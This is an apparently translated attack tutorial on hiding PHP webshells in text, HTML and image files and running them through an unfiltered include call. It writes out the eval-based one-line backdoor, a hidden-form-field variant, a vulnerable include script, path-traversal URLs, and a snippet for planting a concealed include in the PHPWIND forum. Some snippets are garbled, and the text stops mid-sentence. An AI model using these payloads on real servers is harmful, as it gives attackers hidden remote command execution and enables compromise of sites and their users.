You must know that if you just put the PHP statement into the image, it will not be executed anyway, because PHP only parses files with the extension php. So it is necessary to be able to execute the PHP statements hidden in the picture. We just use the calling functions in PHP: include, require, etc.
We still remember the article about hiding Trojans in pictures a few days ago. That is, use statements such as include("x.gif") in the PHP file to call the Trojan horse statements hidden in the image. The statements in ASP are similar. It seems very hidden, but if you call the image directly, it will not be difficult for someone who knows a little bit about PHP to find something suspicious. Since it is difficult to pass parameters using the GET method in the URL, the performance of the Trojan insertion cannot be fully utilized.
The include function is used frequently in PHP, so it causes too many security issues. For example, the vulnerability of PHPWIND1.36 is caused by the lack of filtering of variables behind include. From this we can construct similar statements to insert into PHP files. Then hide the Trojan in a picture or HTML file, which can be said to be more concealed. For example, insert the following statement in the PHPWIND forum: < ''?@include includ/.$PHPWIND_ROOT;? < mailto:?@include 'includ/'.$PHPWIND_ROOT;?>>General administrators cannot see it.
With the help of the include function, we can hide PHP Trojans in many types of files such as txt, html and image files. Because these three types of files, txt, html and image files, are the most common in forums and article systems, we will do the tests in order below.
First create a PHP file test.php. The content of the file is:
<?php
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txt files are generally description files, so we can put the one-sentence Trojan in the description file of the directory. Just create a TXT file t.txt. We paste the sentence Trojan <?eval($_POST[cmd]);?> into the t.txt file. Then visit http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt > If you see t. The content of txt proves OK. Then add the lanker micro PHP backdoor client Trojan address to http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/ index.php?PHPWIND_ROOT=../robots.txt > Just add cmd in the password, and you can see the results returned by execution.
For HTML files, they are generally template files. In order to enable the Trojan horse inserted into the HTML file to be called and executed without being displayed, we can add a text box with hidden attributes in the HTML, such as: <input type=hidden value="<?eval($_POST[cmd ]);?>"> Then use the same method as above. The return results of execution can generally be seen by viewing the source file. For example, use the function of viewing the directory of this program. View the source file content as <input type=hidden value="C:Uniserver2_7swwwtest"> I can get the directory as C:Uniserver2_7swwwtest.
Now let’s talk about image files. The most poisonous trick is to hide the Trojan horse in the image. We can directly edit a picture and insert <?eval($_POST[cmd]);?> at the end of the picture.
After testing, it generally does not affect the picture. Then add the client Trojan address in the same way<